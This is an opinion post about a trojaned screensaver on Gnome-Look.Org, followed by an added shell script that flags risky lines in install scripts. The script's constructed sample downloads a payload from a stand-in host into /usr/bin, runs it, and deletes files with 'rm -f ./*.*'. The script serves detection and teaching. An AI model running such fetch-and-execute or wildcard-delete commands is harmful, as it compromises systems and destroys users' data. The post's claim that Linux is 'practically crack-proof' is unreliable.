So, there was a trojan-infected screensaver uploaded to Gnome-Look.Org (recently removed) that used wget to drop a bash script into /usr/bin/ and then executed it. Originally the script’s contents were a ping command, but this was later changed to: rm -f ./*.*
What does this tell us about Linux security? In fact what does this
tell us about any computer operating system’s security?
Right, it tells us that security means absolutely nothing if a stupid user
is prepared to sacrifice his/her security to get something pretty and
fluffy from an untrusted third-party web site.
The main security for Linux, apart from being practically crack-proof,
is the fact that we get our applications and goodies from verified
secure repositories. That is now history thanks to the Windows mentality
that is infecting the minds of the usually security-conscious Linux
It’s fate. It was bound to happen sooner or later thanks to Linux’s
popularity over the last couple of years. Along with it came the third-party
apps and goodies sites, which generally offer the same stuff that is
available in most distro repos.
My message? Only trust verified Linux distro repos and stay away from these
third-party sites, which lack the staff/time to check each upload before
making it available to the general populace.
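
Added example (not part of the original post): a small shell check that scans a downloaded install script, before it is run, for the three behaviours described above: a wget/curl fetch, a path under a system binary directory, and a wildcard rm. The rule names, regexes and sample script are constructed for illustration; a hit is a prompt to read the line yourself, not proof of malice.

```sh
#!/bin/sh
# Added example: review a downloaded install script BEFORE running it.
# Rules and sample input are constructed for illustration; a hit means
# "read this line yourself", not "this is malware".

# scan_rule RULE REGEX FILE
# Prints "RULE:LINENO:TEXT" for each non-comment line of FILE matching REGEX.
scan_rule() {
    grep -nE -- "$2" "$3" \
        | grep -vE '^[0-9]+:[[:space:]]*#' \
        | sed "s/^/$1:/"
}

# audit_script FILE: run every rule over FILE; no output means no hits.
audit_script() {
    # Network fetch from inside an installer
    scan_rule FETCH '(^|[^[:alnum:]_-])(wget|curl)([[:space:]]|$)' "$1"
    # Any path under a system binary directory (/bin, /usr/bin, /usr/local/sbin, ...)
    scan_rule SYSBIN '(^|[^[:alnum:]_.])(/usr(/local)?)?/s?bin/' "$1"
    # rm whose argument contains a shell wildcard
    scan_rule WILDCARD_RM '(^|[^[:alnum:]_-])rm[[:space:]]+(-[[:alnum:]]+[[:space:]]+)*[^[:space:]]*\*' "$1"
}

# write_sample FILE: constructed script mirroring the behaviour in the post.
write_sample() {
    cat > "$1" <<'EOF'
#!/bin/sh
# constructed sample, never executed by this example
cp theme.png "$HOME/.themes/"
wget http://example.invalid/payload -O /usr/bin/helper.sh
sh /usr/bin/helper.sh
rm -f ./*.*
EOF
}

sample=$(mktemp)
write_sample "$sample"
audit_script "$sample"
rm -f "$sample"
```

The SYSBIN rule also fires on harmless calls such as /usr/bin/env, so treat its output as a reading list rather than a verdict.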